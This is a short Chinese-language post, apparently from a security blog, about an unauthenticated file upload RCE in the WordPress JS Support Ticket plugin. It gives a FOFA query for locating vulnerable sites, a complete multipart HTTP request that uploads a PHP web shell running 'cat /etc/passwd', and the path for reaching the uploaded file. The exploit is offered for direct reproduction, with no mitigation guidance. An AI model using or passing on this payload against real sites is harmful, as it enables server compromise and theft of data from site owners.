Babing
Published on 2024-08-30 / 15 Visits
0
0

W5-4WordPress-Ticket插件-RCE

W5-4WordPress-Ticket插件-RCE

漏洞描述:

WordPress中的JS Support Ticket插件存在未经上传漏洞,未经身份验证的攻击者可以上传恶意脚本的服务器,执行任意指令,从而获取服务器权限。

网络测绘:

fofa语法:

FOFA:body=“wp-content/plugins/js-support-ticket”

漏洞复现:

payload:

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=b983c629ca9b1450283a9b8d1b953898

--b983c629ca9b1450283a9b8d1b953898
Content-Disposition: form-data; name="support_custom_img"; filename="qwe.php"
Content-Type: image/png

<?php system("cat /etc/passwd");?>
--b983c629ca9b1450283a9b8d1b953898
Content-Disposition: form-data; name="action"


--b983c629ca9b1450283a9b8d1b953898
Content-Disposition: form-data; name="form_request"

jssupportticket
--b983c629ca9b1450283a9b8d1b953898--

效果图:

验证url

/wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/上传文件名


Comment